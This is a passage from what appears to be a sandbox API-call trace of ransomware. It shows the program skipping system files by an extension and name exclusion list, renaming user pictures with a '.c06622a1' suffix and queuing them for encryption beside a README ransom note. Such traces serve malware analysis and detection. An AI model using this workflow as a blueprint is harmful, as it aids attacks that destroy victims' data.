[0155.832] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0155.832] wcslen (_String="adv") returned 0x3 [0155.832] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0155.832] wcslen (_String="ani") returned 0x3 [0155.832] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0155.832] wcslen (_String="bat") returned 0x3 [0155.832] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0155.832] wcslen (_String="bin") returned 0x3 [0155.832] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0155.832] wcslen (_String="cab") returned 0x3 [0155.832] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0155.832] wcslen (_String="cmd") returned 0x3 [0155.832] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0155.832] wcslen (_String="com") returned 0x3 [0155.832] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0155.832] wcslen (_String="cpl") returned 0x3 [0155.832] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0155.832] wcslen (_String="cur") returned 0x3 [0155.832] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0155.832] wcslen (_String="deskthemepack") returned 0xd [0155.832] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0155.833] wcslen (_String="diagcab") returned 0x7 [0155.833] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0155.833] wcslen (_String="diagcfg") returned 0x7 [0155.833] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0155.833] wcslen (_String="diagpkg") returned 0x7 [0155.833] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0155.833] wcslen (_String="dll") returned 0x3 [0155.833] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0155.833] wcslen (_String="drv") returned 0x3 [0155.833] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0155.833] wcslen (_String="exe") returned 0x3 [0155.833] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0155.833] wcslen (_String="hlp") returned 0x3 [0155.833] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0155.833] wcslen (_String="icl") returned 0x3 [0155.833] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0155.833] wcslen (_String="icns") returned 0x4 [0155.833] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0155.833] wcslen (_String="ico") returned 0x3 [0155.833] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0155.833] wcslen (_String="ics") returned 0x3 [0155.833] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0155.833] wcslen (_String="idx") returned 0x3 [0155.833] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0155.833] wcslen (_String="ldf") returned 0x3 [0155.833] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0155.833] wcslen (_String="lnk") returned 0x3 [0155.833] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0155.833] wcslen (_String="mod") returned 0x3 [0155.833] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0155.833] wcslen (_String="mpa") returned 0x3 [0155.834] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0155.834] wcslen (_String="msc") returned 0x3 [0155.834] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0155.834] wcslen (_String="msp") returned 0x3 [0155.834] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0155.834] wcslen (_String="msstyles") returned 0x8 [0155.834] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0155.834] wcslen (_String="msu") returned 0x3 [0155.834] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0155.834] wcslen (_String="nls") returned 0x3 [0155.834] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0155.834] wcslen (_String="nomedia") returned 0x7 [0155.834] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0155.834] wcslen (_String="ocx") returned 0x3 [0155.834] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0155.834] wcslen (_String="prf") returned 0x3 [0155.834] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0155.834] wcslen (_String="ps1") returned 0x3 [0155.834] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0155.834] wcslen (_String="rom") returned 0x3 [0155.834] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0155.834] wcslen (_String="rtp") returned 0x3 [0155.834] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0155.834] wcslen (_String="scr") returned 0x3 [0155.834] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0155.834] wcslen (_String="shs") returned 0x3 [0155.834] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0155.834] wcslen (_String="spl") returned 0x3 [0155.834] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0155.834] wcslen (_String="sys") returned 0x3 [0155.834] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0155.834] wcslen (_String="theme") returned 0x5 [0155.835] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0155.835] wcslen (_String="themepack") returned 0x9 [0155.835] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0155.835] wcslen (_String="wpx") returned 0x3 [0155.835] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0155.835] wcslen (_String="lock") returned 0x4 [0155.835] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0155.835] wcslen (_String="key") returned 0x3 [0155.835] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0155.835] wcslen (_String="hta") returned 0x3 [0155.835] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0155.835] wcslen (_String="msi") returned 0x3 [0155.835] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0155.835] wcslen (_String="pdb") returned 0x3 [0155.835] _wcsicmp (_Str1="sql", _Str2="png") returned 3 [0155.835] wcslen (_String="sql") returned 0x3 [0155.835] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0155.835] wcslen (_String="sqlite") returned 0x6 [0155.835] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu")) returned 0x10 [0155.835] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0155.835] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu" [0155.835] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu") returned 0x3b [0155.835] wcscpy (in: _Dest=0x4530120, _Source="JdUgY81.png" | out: _Dest="JdUgY81.png") returned="JdUgY81.png" [0155.835] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\JdUgY81.png", dwFileAttributes=0x80) returned 1 [0155.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\JdUgY81.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\jdugy81.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e0 [0155.836] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.836] ReadFile (in: hFile=0x2e0, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0155.837] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xf6951dc0 [0155.837] RtlComputeCrc32 (PartialCrc=0x1dc0, Buffer=0x3fe674, Length=0x80) returned 0x662b7e9b [0155.837] RtlComputeCrc32 (PartialCrc=0x7e9b, Buffer=0x3fe674, Length=0x80) returned 0x5390645b [0155.837] RtlComputeCrc32 (PartialCrc=0x645b, Buffer=0x3fe674, Length=0x80) returned 0x31bd8d2e [0155.837] RtlComputeCrc32 (PartialCrc=0x8d2e, Buffer=0x3fe674, Length=0x80) returned 0xd45ab57b [0155.837] CloseHandle (hObject=0x2e0) returned 1 [0155.837] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0155.837] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\JdUgY81.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\JdUgY81.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\JdUgY81.png" [0155.837] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\JdUgY81.png") returned 0x47 [0155.837] wcscpy (in: _Dest=0x454013e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.837] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\JdUgY81.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\jdugy81.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\JdUgY81.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\jdugy81.png.c06622a1"), dwFlags=0x8) returned 1 [0155.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\JdUgY81.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\jdugy81.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x2e0 [0155.840] CreateIoCompletionPort (FileHandle=0x2e0, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0155.840] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4a60020 [0155.846] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x680ed225 [0155.846] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7971f48d [0155.846] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x15fcd1b1 [0155.846] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1019d34c [0155.846] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x666eea6c [0155.846] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7439414e [0155.846] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5db2cb85 [0155.846] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7f546619 [0155.850] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4a60094, Length=0x80) returned 0x7726afa6 [0155.850] RtlComputeCrc32 (PartialCrc=0xafa6, Buffer=0x4a60094, Length=0x80) returned 0x964d7a12 [0155.850] RtlComputeCrc32 (PartialCrc=0x7a12, Buffer=0x4a60094, Length=0x80) returned 0x3ac506e6 [0155.850] RtlComputeCrc32 (PartialCrc=0x6e6, Buffer=0x4a60094, Length=0x80) returned 0x551e438c [0155.850] RtlComputeCrc32 (PartialCrc=0x438c, Buffer=0x4a60094, Length=0x80) returned 0x64b525d1 [0155.850] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0155.850] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0155.850] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0155.850] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb7b4b00, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdb7b4b00, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdb7b4b00, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0155.850] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0155.850] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d808d0, ftCreationTime.dwHighDateTime=0x1d5e384, ftLastAccessTime.dwLowDateTime=0xe2c06b0, ftLastAccessTime.dwHighDateTime=0x1d5d913, ftLastWriteTime.dwLowDateTime=0xe2c06b0, ftLastWriteTime.dwHighDateTime=0x1d5d913, nFileSizeHigh=0x0, nFileSizeLow=0xed9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="XyyhMuAsCd.bmp", cAlternateFileName="XYYHMU~1.BMP")) returned 1 [0155.850] _wcsicmp (_Str1="XyyhMuAsCd.bmp", _Str2="README.c06622a1.TXT") returned 6 [0155.850] wcsstr (_Str="XyyhMuAsCd.bmp", _SubStr="README") returned 0x0 [0155.850] _wcsicmp (_Str1="autorun.inf", _Str2="XyyhMuAsCd.bmp") returned -23 [0155.850] wcslen (_String="autorun.inf") returned 0xb [0155.850] _wcsicmp (_Str1="boot.ini", _Str2="XyyhMuAsCd.bmp") returned -22 [0155.850] wcslen (_String="boot.ini") returned 0x8 [0155.850] _wcsicmp (_Str1="bootfont.bin", _Str2="XyyhMuAsCd.bmp") returned -22 [0155.850] wcslen (_String="bootfont.bin") returned 0xc [0155.850] _wcsicmp (_Str1="bootsect.bak", _Str2="XyyhMuAsCd.bmp") returned -22 [0155.850] wcslen (_String="bootsect.bak") returned 0xc [0155.850] _wcsicmp (_Str1="desktop.ini", _Str2="XyyhMuAsCd.bmp") returned -20 [0155.850] wcslen (_String="desktop.ini") returned 0xb [0155.850] _wcsicmp (_Str1="iconcache.db", _Str2="XyyhMuAsCd.bmp") returned -15 [0155.850] wcslen (_String="iconcache.db") returned 0xc [0155.850] _wcsicmp (_Str1="ntldr", _Str2="XyyhMuAsCd.bmp") returned -10 [0155.850] wcslen (_String="ntldr") returned 0x5 [0155.851] _wcsicmp (_Str1="ntuser.dat", _Str2="XyyhMuAsCd.bmp") returned -10 [0155.851] wcslen (_String="ntuser.dat") returned 0xa [0155.851] _wcsicmp (_Str1="ntuser.dat.log", _Str2="XyyhMuAsCd.bmp") returned -10 [0155.851] wcslen (_String="ntuser.dat.log") returned 0xe [0155.851] _wcsicmp (_Str1="ntuser.ini", _Str2="XyyhMuAsCd.bmp") returned -10 [0155.851] wcslen (_String="ntuser.ini") returned 0xa [0155.851] _wcsicmp (_Str1="thumbs.db", _Str2="XyyhMuAsCd.bmp") returned -4 [0155.851] wcslen (_String="thumbs.db") returned 0x9 [0155.851] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0155.851] wcslen (_String="386") returned 0x3 [0155.851] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0155.851] wcslen (_String="adv") returned 0x3 [0155.851] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0155.851] wcslen (_String="ani") returned 0x3 [0155.851] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0155.851] wcslen (_String="bat") returned 0x3 [0155.851] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0155.851] wcslen (_String="bin") returned 0x3 [0155.851] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0155.851] wcslen (_String="cab") returned 0x3 [0155.851] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0155.851] wcslen (_String="cmd") returned 0x3 [0155.851] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0155.851] wcslen (_String="com") returned 0x3 [0155.851] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0155.851] wcslen (_String="cpl") returned 0x3 [0155.851] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0155.851] wcslen (_String="cur") returned 0x3 [0155.851] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0155.851] wcslen (_String="deskthemepack") returned 0xd [0155.851] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0155.852] wcslen (_String="diagcab") returned 0x7 [0155.852] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0155.852] wcslen (_String="diagcfg") returned 0x7 [0155.852] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0155.852] wcslen (_String="diagpkg") returned 0x7 [0155.852] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0155.852] wcslen (_String="dll") returned 0x3 [0155.852] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0155.852] wcslen (_String="drv") returned 0x3 [0155.852] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0155.852] wcslen (_String="exe") returned 0x3 [0155.852] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0155.852] wcslen (_String="hlp") returned 0x3 [0155.852] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0155.852] wcslen (_String="icl") returned 0x3 [0155.852] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0155.852] wcslen (_String="icns") returned 0x4 [0155.852] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0155.852] wcslen (_String="ico") returned 0x3 [0155.852] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0155.852] wcslen (_String="ics") returned 0x3 [0155.852] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0155.852] wcslen (_String="idx") returned 0x3 [0155.852] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0155.852] wcslen (_String="ldf") returned 0x3 [0155.852] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0155.852] wcslen (_String="lnk") returned 0x3 [0155.852] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0155.852] wcslen (_String="mod") returned 0x3 [0155.852] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0155.852] wcslen (_String="mpa") returned 0x3 [0155.853] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0155.853] wcslen (_String="msc") returned 0x3 [0155.853] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0155.853] wcslen (_String="msp") returned 0x3 [0155.853] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0155.853] wcslen (_String="msstyles") returned 0x8 [0155.853] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0155.853] wcslen (_String="msu") returned 0x3 [0155.853] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0155.853] wcslen (_String="nls") returned 0x3 [0155.853] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0155.853] wcslen (_String="nomedia") returned 0x7 [0155.853] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0155.853] wcslen (_String="ocx") returned 0x3 [0155.853] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0155.853] wcslen (_String="prf") returned 0x3 [0155.853] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0155.853] wcslen (_String="ps1") returned 0x3 [0155.853] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0155.853] wcslen (_String="rom") returned 0x3 [0155.853] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0155.853] wcslen (_String="rtp") returned 0x3 [0155.853] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0155.853] wcslen (_String="scr") returned 0x3 [0155.853] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0155.853] wcslen (_String="shs") returned 0x3 [0155.853] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0155.853] wcslen (_String="spl") returned 0x3 [0155.853] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0155.853] wcslen (_String="sys") returned 0x3 [0155.853] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0155.854] wcslen (_String="theme") returned 0x5 [0155.854] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0155.854] wcslen (_String="themepack") returned 0x9 [0155.854] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0155.854] wcslen (_String="wpx") returned 0x3 [0155.854] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0155.854] wcslen (_String="lock") returned 0x4 [0155.854] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0155.854] wcslen (_String="key") returned 0x3 [0155.854] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0155.854] wcslen (_String="hta") returned 0x3 [0155.854] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0155.854] wcslen (_String="msi") returned 0x3 [0155.854] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0155.854] wcslen (_String="pdb") returned 0x3 [0155.854] _wcsicmp (_Str1="sql", _Str2="bmp") returned 17 [0155.854] wcslen (_String="sql") returned 0x3 [0155.854] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0155.854] wcslen (_String="sqlite") returned 0x6 [0155.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu")) returned 0x10 [0155.854] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0155.854] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu" [0155.854] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu") returned 0x3b [0155.854] wcscpy (in: _Dest=0x4530120, _Source="XyyhMuAsCd.bmp" | out: _Dest="XyyhMuAsCd.bmp") returned="XyyhMuAsCd.bmp" [0155.854] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\XyyhMuAsCd.bmp", dwFileAttributes=0x80) returned 1 [0155.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\XyyhMuAsCd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\xyyhmuascd.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x66c [0155.855] SetFilePointerEx (in: hFile=0x66c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.855] ReadFile (in: hFile=0x66c, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0155.856] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xbd8189df [0155.856] RtlComputeCrc32 (PartialCrc=0x89df, Buffer=0x3fe674, Length=0x80) returned 0x55fc5e27 [0155.856] RtlComputeCrc32 (PartialCrc=0x5e27, Buffer=0x3fe674, Length=0x80) returned 0x6bfc9d85 [0155.856] RtlComputeCrc32 (PartialCrc=0x9d85, Buffer=0x3fe674, Length=0x80) returned 0x1bbd8380 [0155.856] RtlComputeCrc32 (PartialCrc=0x8380, Buffer=0x3fe674, Length=0x80) returned 0x1c8c1072 [0155.856] CloseHandle (hObject=0x66c) returned 1 [0155.856] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0155.856] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\XyyhMuAsCd.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\XyyhMuAsCd.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\XyyhMuAsCd.bmp" [0155.856] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\XyyhMuAsCd.bmp") returned 0x4a [0155.856] wcscpy (in: _Dest=0x4540144, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.856] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\XyyhMuAsCd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\xyyhmuascd.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\XyyhMuAsCd.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\xyyhmuascd.bmp.c06622a1"), dwFlags=0x8) returned 1 [0155.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\XyyhMuAsCd.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\xyyhmuascd.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x66c [0155.859] CreateIoCompletionPort (FileHandle=0x66c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0155.859] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4af0020 [0155.865] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2c730136 [0155.865] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x662a4a36 [0155.865] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x43b0f6ee [0155.865] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x101e5df2 [0155.865] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x77a0c40a [0155.865] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1669d2c8 [0155.865] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x67f5933a [0155.865] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x681e321f [0155.868] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4af0094, Length=0x80) returned 0xecf1b909 [0155.868] RtlComputeCrc32 (PartialCrc=0xb909, Buffer=0x4af0094, Length=0x80) returned 0x99b3d102 [0155.868] RtlComputeCrc32 (PartialCrc=0xd102, Buffer=0x4af0094, Length=0x80) returned 0xd1647f9 [0155.868] RtlComputeCrc32 (PartialCrc=0x47f9, Buffer=0x4af0094, Length=0x80) returned 0x74ab8856 [0155.868] RtlComputeCrc32 (PartialCrc=0x8856, Buffer=0x4af0094, Length=0x80) returned 0x95b0d843 [0155.868] PostQueuedCompletionStatus 